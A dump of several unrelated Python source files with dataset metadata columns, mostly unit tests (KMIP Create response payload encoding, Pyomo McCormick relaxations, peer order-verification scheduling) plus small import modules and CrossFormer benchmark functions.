payload.object_type
)
self.assertEqual(
'fb4b5b9c-6188-4c63-8142-fe9c328129fc',
payload.unique_identifier
)
self.assertEqual(
objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'State'
),
attribute_value=primitives.Enumeration(
enums.State,
value=enums.State.PRE_ACTIVE,
tag=enums.Tags.STATE
)
)
]
),
payload.template_attribute
)
def test_read_kmip_2_0(self):
"""
Test that a Create response payload can be read from a data stream
encoded with the KMIP 2.0 format.
"""
payload = payloads.CreateResponsePayload()
self.assertIsNone(payload.object_type)
self.assertIsNone(payload.unique_identifier)
self.assertIsNone(payload.template_attribute)
payload.read(
self.no_template_attribute_encoding,
kmip_version=enums.KMIPVersion.KMIP_2_0
)
self.assertEqual(
enums.ObjectType.SYMMETRIC_KEY,
payload.object_type
)
self.assertEqual(
'fb4b5b9c-6188-4c63-8142-fe9c328129fc',
payload.unique_identifier
)
self.assertIsNone(payload.template_attribute)
def test_read_missing_object_type(self):
"""
Test that an InvalidKmipEncoding error is raised during the decoding
of a Create response payload when the object type is missing from the
encoding.
"""
payload = payloads.CreateResponsePayload()
self.assertIsNone(payload.object_type)
self.assertIsNone(payload.unique_identifier)
self.assertIsNone(payload.template_attribute)
args = (self.no_object_type_encoding, )
self.assertRaisesRegex(
exceptions.InvalidKmipEncoding,
"The Create response payload encoding is missing the object type.",
payload.read,
*args
)
def test_read_missing_unique_identifier(self):
"""
Test that an InvalidKmipEncoding error is raised during the decoding
of a Create response payload when the unique identifier is missing
from the encoding.
"""
payload = payloads.CreateResponsePayload()
self.assertIsNone(payload.object_type)
self.assertIsNone(payload.unique_identifier)
self.assertIsNone(payload.template_attribute)
args = (self.no_unique_identifier_encoding, )
self.assertRaisesRegex(
exceptions.InvalidKmipEncoding,
"The Create response payload encoding is missing the unique "
"identifier.",
payload.read,
*args
)
def test_read_missing_template_attribute(self):
"""
Test that a Create response payload can be read from a data stream
event when missing the template attribute.
"""
payload = payloads.CreateResponsePayload()
self.assertEqual(None, payload.object_type)
self.assertEqual(None, payload.unique_identifier)
self.assertEqual(None, payload.template_attribute)
payload.read(self.no_template_attribute_encoding)
self.assertEqual(
enums.ObjectType.SYMMETRIC_KEY,
payload.object_type
)
self.assertEqual(
'fb4b5b9c-6188-4c63-8142-fe9c328129fc',
payload.unique_identifier
)
self.assertIsNone(payload.template_attribute)
def test_write(self):
"""
Test that a Create response payload can be written to a data stream.
"""
payload = payloads.CreateResponsePayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
unique_identifier="fb4b5b9c-6188-4c63-8142-fe9c328129fc",
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
"State"
),
attribute_value=primitives.Enumeration(
enums.State,
value=enums.State.PRE_ACTIVE,
tag=enums.Tags.STATE
)
)
]
)
)
stream = utils.BytearrayStream()
payload.write(stream)
self.assertEqual(len(self.full_encoding), len(stream))
self.assertEqual(str(self.full_encoding), str(stream))
def test_write_kmip_2_0(self):
"""
Test that a Create response payload can be written to a data stream
encoded with the KMIP 2.0 format.
"""
payload = payloads.CreateResponsePayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
unique_identifier="fb4b5b9c-6188-4c63-8142-fe9c328129fc",
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
"State"
),
attribute_value=primitives.Enumeration(
enums.State,
value=enums.State.PRE_ACTIVE,
tag=enums.Tags.STATE
)
)
]
)
)
stream = utils.BytearrayStream()
payload.write(stream, kmip_version=enums.KMIPVersion.KMIP_2_0)
self.assertEqual(len(self.no_template_attribute_encoding), len(stream))
self.assertEqual(str(self.no_template_attribute_encoding), str(stream))
def test_write_missing_object_type(self):
"""
Test that an InvalidField error is raised during the encoding of a
Create response payload when the payload is missing the object type.
"""
payload = payloads.CreateResponsePayload(
unique_identifier="fb4b5b9c-6188-4c63-8142-fe9c328129fc",
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
"State"
),
attribute_value=primitives.Enumeration(
enums.State,
value=enums.State.PRE_ACTIVE,
tag=enums.Tags.STATE
)
)
]
)
)
stream = utils.BytearrayStream()
args = (stream, )
self.assertRaisesRegex(
exceptions.InvalidField,
"The Create response payload is missing the object type field.",
payload.write,
*args
)
def test_write_missing_unique_identifier(self):
"""
Test that an InvalidField error is raised during the encoding of a
Create response payload when the payload is missing the unique
identifier.
"""
payload = payloads.CreateResponsePayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
"State"
),
attribute_value=primitives.Enumeration(
enums.State,
value=enums.State.PRE_ACTIVE,
tag=enums.Tags.STATE
)
)
]
)
)
stream = utils.BytearrayStream()
args = (stream, )
self.assertRaisesRegex(
exceptions.InvalidField,
"The Create response payload is missing the unique identifier "
"field.",
payload.write,
*args
)
def test_write_missing_template_attribute(self):
"""
Test that a Create response payload can be written to a data stream
even when missing the template attribute.
"""
payload = payloads.CreateResponsePayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
unique_identifier="fb4b5b9c-6188-4c63-8142-fe9c328129fc"
)
stream = utils.BytearrayStream()
payload.write(stream)
self.assertEqual(len(self.no_template_attribute_encoding), len(stream))
self.assertEqual(str(self.no_template_attribute_encoding), str(stream))
def test_repr(self):
"""
Test that repr can be applied to a Create response payload structure.
"""
payload = payloads.CreateResponsePayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
unique_identifier="fb4b5b9c-6188-4c63-8142-fe9c328129fc",
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
"State"
),
attribute_value=primitives.Enumeration(
enums.State,
value=enums.State.PRE_ACTIVE,
tag=enums.Tags.STATE
)
)
]
)
)
self.assertEqual(
"CreateResponsePayload("
"object_type=ObjectType.SYMMETRIC_KEY, "
"unique_identifier='fb4b5b9c-6188-4c63-8142-fe9c328129fc', "
"template_attribute=Struct())",
repr(payload)
)
def test_str(self):
"""
Test that str can be applied to a Create response payload structure.
"""
payload = payloads.CreateResponsePayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
unique_identifier="fb4b5b9c-6188-4c63-8142-fe9c328129fc",
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
"State"
),
attribute_value=primitives.Enumeration(
enums.State,
value=enums.State.PRE_ACTIVE,
tag=enums.Tags.STATE
)
)
]
)
)
self.assertEqual(
'{'
'"object_type": ObjectType.SYMMETRIC_KEY, '
'"unique_identifier": "fb4b5b9c-6188-4c63-8142-fe9c328129fc", '
'"template_attribute": Struct()'
'}',
str(payload)
)
def test_equal_on_equal(self):
"""
Test that the equality operator returns True when comparing two Create
response payloads with the same data.
"""
a = payloads.CreateResponsePayload()
b = payloads.CreateResponsePayload()
self.assertTrue(a == b)
self.assertTrue(b == a)
a = payloads.CreateResponsePayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
unique_identifier="fb4b5b9c-6188-4c63-8142-fe9c328129fc",
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
"State"
),
attribute_value=primitives.Enumeration(
enums.State,
value=enums.State.PRE_ACTIVE,
tag=enums.Tags.STATE
)
)
]
)
)
b = payloads.CreateResponsePayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
unique_identifier="fb4b5b9c-6188-4c63-8142-fe9c328129fc",
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
"State"
),
attribute_value=primitives.Enumeration(
enums.State,
value=enums.State.PRE_ACTIVE,
tag=enums.Tags.STATE
)
)
]
)
)
self.assertTrue(a == b)
self.assertTrue(b == a)
def test_equal_on_not_equal_object_type(self):
"""
Test that the equality operator returns False when comparing two Create
response payloads with different object types.
"""
a = payloads.CreateResponsePayload(
object_type=enums.ObjectType.SYMMETRIC_KEY
)
b = payloads.CreateResponsePayload(
object_type=enums.ObjectType.SECRET_DATA
)
self.assertFalse(a == b)
self.assertFalse(b == a)
def test_equal_on_not_equal_unique_identifier(self):
"""
Test that the equality operator returns False when comparing two Create
response payloads with different unique identifiers.
"""
a = payloads.CreateResponsePayload(unique_identifier="a")
b = payloads.CreateResponsePayload(unique_identifier="b")
self.assertFalse(a == b)
self.assertFalse(b == a)
def test_equal_on_not_equal_template_attribute(self):
"""
Test that the equality operator returns False when comparing two Create
response payloads with different template attributes.
"""
a = payloads.CreateResponsePayload(
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
"State"
),
attribute_value=primitives.Enumeration(
enums.State,
value=enums.State.PRE_ACTIVE,
tag=enums.Tags.STATE
)
)
]
)
)
b = payloads.CreateResponsePayload(
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
"State"
),
attribute_value=primitives.Enumeration(
enums.State,
value=enums.State.ACTIVE,
tag=enums.Tags.STATE
)
)
]
)
)
self.assertFalse(a == b)
self.assertFalse(b == a)
def test_equal_on_type_mismatch(self):
"""
Test that the equality operator returns False when comparing two Create
response payloads with different types.
"""
a = payloads.CreateResponsePayload()
b = "invalid"
self.assertFalse(a == b)
self.assertFalse(b == a)
def test_not_equal_on_equal(self):
"""
Test that the inequality operator returns False when comparing two
Create response payloads with the same data.
"""
a = payloads.CreateResponsePayload()
b = payloads.CreateResponsePayload()
self.assertFalse(a != b)
self.assertFalse(b != a)
a = payloads.CreateResponsePayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
unique_identifier="fb4b5b9c-6188-4c63-8142-fe9c328129fc",
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
"State"
),
attribute_value=primitives.Enumeration(
enums.State,
value=enums.State.PRE_ACTIVE,
tag=enums.Tags.STATE
)
)
]
)
)
b = payloads.CreateResponsePayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
unique_identifier="fb4b5b9c-6188-4c63-8142-fe9c328129fc",
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
"State"
),
attribute_value=primitives.Enumeration(
enums.State,
value=enums.State.PRE_ACTIVE,
tag=enums.Tags.STATE
)
)
]
)
)
self.assertFalse(a != b)
self.assertFalse(b != a)
def test_not_equal_on_not_equal_object_type(self):
"""
Test that the inequality operator returns True when comparing two
Create response payloads with different object types.
"""
a = payloads.CreateResponsePayload(
object_type=enums.ObjectType.SYMMETRIC_KEY
)
b = payloads.CreateResponsePayload(
object_type=enums.ObjectType.SECRET_DATA
)
self.assertTrue(a != b)
self.assertTrue(b != a)
def test_not_equal_on_not_equal_unique_identifier(self):
"""
Test that the inequality operator returns True when comparing two
Create response payloads with different unique identifiers.
"""
a = payloads.CreateResponsePayload(unique_identifier="a")
b = payloads.CreateResponsePayload(unique_identifier="b")
self.assertTrue(a != b)
self.assertTrue(b != a)
def test_not_equal_on_not_equal_template_attribute(self):
"""
Test that the inequality operator returns True when comparing two
Create response payloads with different template attributes.
"""
a = payloads.CreateResponsePayload(
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
"State"
),
attribute_value=primitives.Enumeration(
enums.State,
value=enums.State.PRE_ACTIVE,
tag=enums.Tags.STATE
)
)
]
)
)
b = payloads.CreateResponsePayload(
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
"State"
),
attribute_value=primitives.Enumeration(
enums.State,
value=enums.State.ACTIVE,
tag=enums.Tags.STATE
)
)
]
)
)
self.assertTrue(a != b)
self.assertTrue(b != a)
def test_not_equal_on_type_mismatch(self):
"""
Test that the inequality operator returns True when comparing two
Create response payloads with different types.
"""
a = payloads.CreateResponsePayload()
b = "invalid"
self.assertTrue(a != b)
self.assertTrue(b != a)
| 38.028954
| 79
| 0.521107
| 6,006
| 70,924
| 6.039294
| 0.048452
| 0.037384
| 0.031016
| 0.039176
| 0.963967
| 0.956247
| 0.937665
| 0.93342
| 0.927354
| 0.925232
| 0
| 0.05228
| 0.405589
| 70,924
| 1,864
| 80
| 38.049356
| 0.808103
| 0.13279
| 0
| 0.752294
| 0
| 0.021877
| 0.121416
| 0.078694
| 0
| 0
| 0
| 0
| 0.090332
| 1
| 0.038109
| false
| 0
| 0.00494
| 0
| 0.04446
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e62203163b014ffdba47a66c63c9e10cb750de3f
| 68
|
py
|
Python
|
kernels/utils/__init__.py
|
sirCamp/tensorflow-kernels
|
e3d459406f463bb646e150c3bab89d8410f86f16
|
[
"MIT"
] | 3
|
2019-10-19T09:21:04.000Z
|
2020-09-25T14:45:38.000Z
|
kernels/utils/__init__.py
|
sirCamp/tensorflow-kernels
|
e3d459406f463bb646e150c3bab89d8410f86f16
|
[
"MIT"
] | null | null | null |
kernels/utils/__init__.py
|
sirCamp/tensorflow-kernels
|
e3d459406f463bb646e150c3bab89d8410f86f16
|
[
"MIT"
] | null | null | null |
from utils import array_to_tensor
from utils import tensor_to_array
| 22.666667
| 33
| 0.882353
| 12
| 68
| 4.666667
| 0.5
| 0.321429
| 0.535714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 68
| 2
| 34
| 34
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
053bdf80bb78f649636efa51b24fa1d244e84c1f
| 3,653
|
py
|
Python
|
coramin/relaxations/tests/test_mccormick.py
|
dilr/Coramin
|
22187e5f9e1631867c29f981ff6dc035341bd23d
|
[
"BSD-3-Clause"
] | 11
|
2019-04-03T21:33:29.000Z
|
2022-02-28T06:07:03.000Z
|
coramin/relaxations/tests/test_mccormick.py
|
dilr/Coramin
|
22187e5f9e1631867c29f981ff6dc035341bd23d
|
[
"BSD-3-Clause"
] | 50
|
2019-04-01T18:48:14.000Z
|
2022-03-04T21:51:27.000Z
|
coramin/relaxations/tests/test_mccormick.py
|
dilr/Coramin
|
22187e5f9e1631867c29f981ff6dc035341bd23d
|
[
"BSD-3-Clause"
] | 9
|
2019-03-31T21:29:35.000Z
|
2021-09-02T02:33:40.000Z
|
import pyomo.environ as pyo
import unittest
import coramin
class TestMcCormick(unittest.TestCase):
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
pass
def test_mccormick1(self):
model = pyo.ConcreteModel()
model.x = pyo.Var(bounds=(0, 6))
model.y = pyo.Var(bounds=(0, 3))
model.w = pyo.Var()
model.obj = pyo.Objective(expr=-model.w - 2 * model.x)
model.con = pyo.Constraint(expr=model.w <= 12)
model.mc = coramin.relaxations.PWMcCormickRelaxation()
model.mc.build(x1=model.x, x2=model.y, aux_var=model.w)
linsolver = pyo.SolverFactory('gurobi_direct')
linsolver.solve(model)
self.assertAlmostEqual(pyo.value(model.x), 6.0, 6)
self.assertAlmostEqual(pyo.value(model.y), 2.0, 6)
def test_mccormick2(self):
model = pyo.ConcreteModel()
model.x = pyo.Var(bounds=(0, 6))
model.y = pyo.Var(bounds=(0, 3))
model.w = pyo.Var()
model.obj = pyo.Objective(expr=-model.w - 2 * model.x)
model.con = pyo.Constraint(expr=model.w <= 12)
def mc_rule(b):
b.build(x1=model.x, x2=model.y, aux_var=model.w)
model.mc = coramin.relaxations.PWMcCormickRelaxation(rule=mc_rule)
linsolver = pyo.SolverFactory('gurobi_direct')
linsolver.solve(model)
self.assertAlmostEqual(pyo.value(model.x), 6.0, 6)
self.assertAlmostEqual(pyo.value(model.y), 2.0, 6)
def test_mccormick3_BOTH(self):
model = pyo.ConcreteModel()
model.x = pyo.Var(bounds=(0, 6))
model.y = pyo.Var(bounds=(0, 3))
model.w = pyo.Var()
model.obj = pyo.Objective(expr=-model.w - 2 * model.x)
model.con = pyo.Constraint(expr=model.w <= 12)
def mc_rule(b):
m = b.parent_block()
b.build(x1=m.x, x2=m.y, aux_var=m.w)
model.mc = coramin.relaxations.PWMcCormickRelaxation(rule=mc_rule)
linsolver = pyo.SolverFactory('gurobi_direct', tee=True)
linsolver.solve(model)
self.assertAlmostEqual(pyo.value(model.x), 6.0, 6)
self.assertAlmostEqual(pyo.value(model.y), 2.0, 6)
def test_mccormick3_OVER(self):
model = pyo.ConcreteModel()
model.x = pyo.Var(bounds=(0, 6))
model.y = pyo.Var(bounds=(0, 3))
model.w = pyo.Var()
model.obj = pyo.Objective(expr=-model.w + 0.1*model.x + 0.1*model.y)
model.con = pyo.Constraint(expr=model.w <= 12)
def mc_rule(b):
m = b.parent_block()
b.build(x1=m.x, x2=m.y, aux_var=m.w, relaxation_side=coramin.utils.RelaxationSide.OVER)
model.mc = coramin.relaxations.PWMcCormickRelaxation(rule=mc_rule)
linsolver = pyo.SolverFactory('gurobi_direct')
linsolver.solve(model)
self.assertAlmostEqual(pyo.value(model.x), 4.0, 6)
self.assertAlmostEqual(pyo.value(model.y), 2.0, 6)
def test_mccormick3_UNDER(self):
model = pyo.ConcreteModel()
model.x = pyo.Var(bounds=(0, 6))
model.y = pyo.Var(bounds=(0, 3))
model.w = pyo.Var()
model.obj = pyo.Objective(expr=-model.w - 2 * model.x)
model.con = pyo.Constraint(expr=model.w <= 12)
def mc_rule(b):
m = b.parent_block()
b.build(x1=m.x, x2=m.y, aux_var=m.w, relaxation_side=coramin.utils.RelaxationSide.UNDER)
model.mc = coramin.relaxations.PWMcCormickRelaxation(rule=mc_rule)
linsolver = pyo.SolverFactory('gurobi_direct', tee=True)
linsolver.solve(model)
self.assertAlmostEqual(pyo.value(model.w), 12.0, 6)
| 35.466019
| 100
| 0.612373
| 509
| 3,653
| 4.333988
| 0.133595
| 0.048957
| 0.054397
| 0.05893
| 0.896646
| 0.875793
| 0.875793
| 0.875793
| 0.875793
| 0.875793
| 0
| 0.029263
| 0.242267
| 3,653
| 102
| 101
| 35.813725
| 0.767702
| 0
| 0
| 0.753086
| 0
| 0
| 0.017794
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 1
| 0.135802
| false
| 0.024691
| 0.037037
| 0
| 0.185185
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0546bcddbb513242432023435efa8c4237b6ba70
| 125
|
py
|
Python
|
mountainlab_pytools/__init__.py
|
tjd2002/mountainlab_pytools
|
19b4ab06b073a7cfd9535b9285fd95471e731df9
|
[
"Apache-2.0"
] | null | null | null |
mountainlab_pytools/__init__.py
|
tjd2002/mountainlab_pytools
|
19b4ab06b073a7cfd9535b9285fd95471e731df9
|
[
"Apache-2.0"
] | null | null | null |
mountainlab_pytools/__init__.py
|
tjd2002/mountainlab_pytools
|
19b4ab06b073a7cfd9535b9285fd95471e731df9
|
[
"Apache-2.0"
] | 1
|
2019-01-19T04:07:15.000Z
|
2019-01-19T04:07:15.000Z
|
from mountainlab_pytools import mdaio
from mountainlab_pytools import processormanager
from mountainlab_pytools import mlproc
| 41.666667
| 48
| 0.912
| 15
| 125
| 7.4
| 0.466667
| 0.405405
| 0.594595
| 0.756757
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088
| 125
| 3
| 49
| 41.666667
| 0.973684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0558f8c316f4258b3bc2770e9297874dda77ceb9
| 90
|
py
|
Python
|
nami/AI/__init__.py
|
namirinz/nami
|
b74b3d302aa241470ce6ae210c5a2f0e09dd8bf2
|
[
"MIT"
] | 2
|
2020-08-03T10:37:45.000Z
|
2020-10-11T14:55:05.000Z
|
nami/AI/__init__.py
|
namirinz/nami
|
b74b3d302aa241470ce6ae210c5a2f0e09dd8bf2
|
[
"MIT"
] | null | null | null |
nami/AI/__init__.py
|
namirinz/nami
|
b74b3d302aa241470ce6ae210c5a2f0e09dd8bf2
|
[
"MIT"
] | null | null | null |
from nami.AI.kme_tokenize import Tokenizer
from nami.AI.kme_tokenize import Segmentation
| 22.5
| 45
| 0.855556
| 14
| 90
| 5.357143
| 0.571429
| 0.213333
| 0.266667
| 0.346667
| 0.72
| 0.72
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 90
| 3
| 46
| 30
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
0575edf17964e46cc3a15db61b68f332ba3a0446
| 94
|
py
|
Python
|
python/datadict/core/dto/__init__.py
|
jiportilla/ontology
|
8a66bb7f76f805c64fc76cfc40ab7dfbc1146f40
|
[
"MIT"
] | null | null | null |
python/datadict/core/dto/__init__.py
|
jiportilla/ontology
|
8a66bb7f76f805c64fc76cfc40ab7dfbc1146f40
|
[
"MIT"
] | null | null | null |
python/datadict/core/dto/__init__.py
|
jiportilla/ontology
|
8a66bb7f76f805c64fc76cfc40ab7dfbc1146f40
|
[
"MIT"
] | null | null | null |
from .punctuation_kb import the_apostrophes_dict
from .enclitics_kb import the_enclitics_dict
| 31.333333
| 48
| 0.893617
| 14
| 94
| 5.571429
| 0.571429
| 0.205128
| 0.282051
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 94
| 2
| 49
| 47
| 0.906977
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e9b5bdac13c646674c115ffb4126110ce82ffdc2
| 2,536
|
py
|
Python
|
test/node/test_send_orders_to_on_chain_check.py
|
0xProject/p2p_incentives
|
ce69926eb3d003fb2767651df9486556c0e20ab6
|
[
"Apache-2.0"
] | 3
|
2020-03-11T19:42:48.000Z
|
2021-04-01T21:09:05.000Z
|
test/node/test_send_orders_to_on_chain_check.py
|
0xProject/p2p_incentives
|
ce69926eb3d003fb2767651df9486556c0e20ab6
|
[
"Apache-2.0"
] | null | null | null |
test/node/test_send_orders_to_on_chain_check.py
|
0xProject/p2p_incentives
|
ce69926eb3d003fb2767651df9486556c0e20ab6
|
[
"Apache-2.0"
] | null | null | null |
"""
This module contains unit tests of send_orders_to_on_chain_check().
"""
from typing import List
import pytest
from message import Order
from node import Peer
from ..__init__ import (
SCENARIO_SAMPLE,
ENGINE_SAMPLE,
create_a_test_peer,
create_test_orders,
)
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_send_orders_to_on_chain_check__new_entry(scenario, engine) -> None:
"""
This function is the unit test of send_orders_to_on_chain_check(), when the
peer.verification_time_orders_mapping[new_entry] does not exist.
"""
# Arrange.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
order_list: List[Order] = create_test_orders(scenario, 7)
# let the first three orders be in my_peer.verification_time_orders_mapping[0]
my_peer.verification_time_orders_mapping[0] += order_list[0:3]
# let the rest four orders be in my_peer.verification_time_orders_mapping[8]
my_peer.verification_time_orders_mapping[8] = order_list[3:7]
# Act.
# now send orders to on-chain check and it is supposed to be finished at time 6.
my_peer.send_orders_to_on_chain_check(6)
# Assert.
for order in order_list[0:3]:
assert order in my_peer.verification_time_orders_mapping[6]
for order in order_list[3:7]:
assert order in my_peer.verification_time_orders_mapping[8]
assert not my_peer.verification_time_orders_mapping[0]
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_send_orders_to_on_chain_check__existing_entry(scenario, engine) -> None:
"""
This function is the unit test of send_orders_to_on_chain_check(), when the
peer.verification_time_orders_mapping[new_entry] already exists.
"""
# Arrange.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
order_list: List[Order] = create_test_orders(scenario, 7)
# let the first three orders be in my_peer.verification_time_orders_mapping[0]
my_peer.verification_time_orders_mapping[0] += order_list[0:3]
# let the rest four orders be in my_peer.verification_time_orders_mapping[8]
my_peer.verification_time_orders_mapping[6] = order_list[3:7]
# Act.
# now send orders to on-chain check and it is supposed to be finished at time 6.
my_peer.send_orders_to_on_chain_check(6)
# Assert.
for order in order_list:
assert order in my_peer.verification_time_orders_mapping[6]
assert not my_peer.verification_time_orders_mapping[0]
| 36.753623
| 84
| 0.754338
| 396
| 2,536
| 4.474747
| 0.176768
| 0.057562
| 0.1693
| 0.22009
| 0.88149
| 0.870767
| 0.870767
| 0.854966
| 0.854402
| 0.776524
| 0
| 0.015581
| 0.164827
| 2,536
| 68
| 85
| 37.294118
| 0.821058
| 0.337539
| 0
| 0.4375
| 0
| 0
| 0.018484
| 0
| 0
| 0
| 0
| 0
| 0.15625
| 1
| 0.0625
| false
| 0
| 0.15625
| 0
| 0.21875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e9bbb7efcfd8c949ed7e375c6adc3c11a6b31995
| 1,618
|
py
|
Python
|
benchmark/test_crossformer.py
|
Oneflow-Inc/vision
|
352e9240f63118112ea174bb2d0b502fa54be16f
|
[
"BSD-3-Clause"
] | 40
|
2021-10-19T02:34:56.000Z
|
2022-03-25T07:49:44.000Z
|
benchmark/test_crossformer.py
|
Oneflow-Inc/vision
|
352e9240f63118112ea174bb2d0b502fa54be16f
|
[
"BSD-3-Clause"
] | 53
|
2021-10-22T02:24:44.000Z
|
2022-03-31T04:20:47.000Z
|
benchmark/test_crossformer.py
|
Oneflow-Inc/vision
|
352e9240f63118112ea174bb2d0b502fa54be16f
|
[
"BSD-3-Clause"
] | 11
|
2022-01-06T02:57:07.000Z
|
2022-03-23T15:19:51.000Z
|
from benchmark import *
import oneflow_benchmark
from flowvision.models.crossformer import crossformer_tiny_patch4_group7_224
@oneflow_benchmark.ci_settings(compare={"median": "5%"})
def test_crossformer_tiny_patch4_group7_224_batch_size1(
benchmark, net=crossformer_tiny_patch4_group7_224, input_shape=[1, 3, 224, 224]
):
model, x, optimizer = fetch_args(net, input_shape)
benchmark(run, model, x, optimizer)
@oneflow_benchmark.ci_settings(compare={"median": "5%"})
def test_crossformer_tiny_patch4_group7_224_batch_size2(
benchmark, net=crossformer_tiny_patch4_group7_224, input_shape=[2, 3, 224, 224]
):
model, x, optimizer = fetch_args(net, input_shape)
benchmark(run, model, x, optimizer)
@oneflow_benchmark.ci_settings(compare={"median": "5%"})
def test_crossformer_tiny_patch4_group7_224_batch_size4(
benchmark, net=crossformer_tiny_patch4_group7_224, input_shape=[4, 3, 224, 224]
):
model, x, optimizer = fetch_args(net, input_shape)
benchmark(run, model, x, optimizer)
@oneflow_benchmark.ci_settings(compare={"median": "5%"})
def test_crossformer_tiny_patch4_group7_224_batch_size8(
benchmark, net=crossformer_tiny_patch4_group7_224, input_shape=[8, 3, 224, 224]
):
model, x, optimizer = fetch_args(net, input_shape)
benchmark(run, model, x, optimizer)
@oneflow_benchmark.ci_settings(compare={"median": "5%"})
def test_crossformer_tiny_patch4_group7_224_batch_size16(
benchmark, net=crossformer_tiny_patch4_group7_224, input_shape=[16, 3, 224, 224]
):
model, x, optimizer = fetch_args(net, input_shape)
benchmark(run, model, x, optimizer)
| 36.772727
| 84
| 0.772559
| 226
| 1,618
| 5.154867
| 0.172566
| 0.141631
| 0.198283
| 0.254936
| 0.905579
| 0.879828
| 0.879828
| 0.879828
| 0.879828
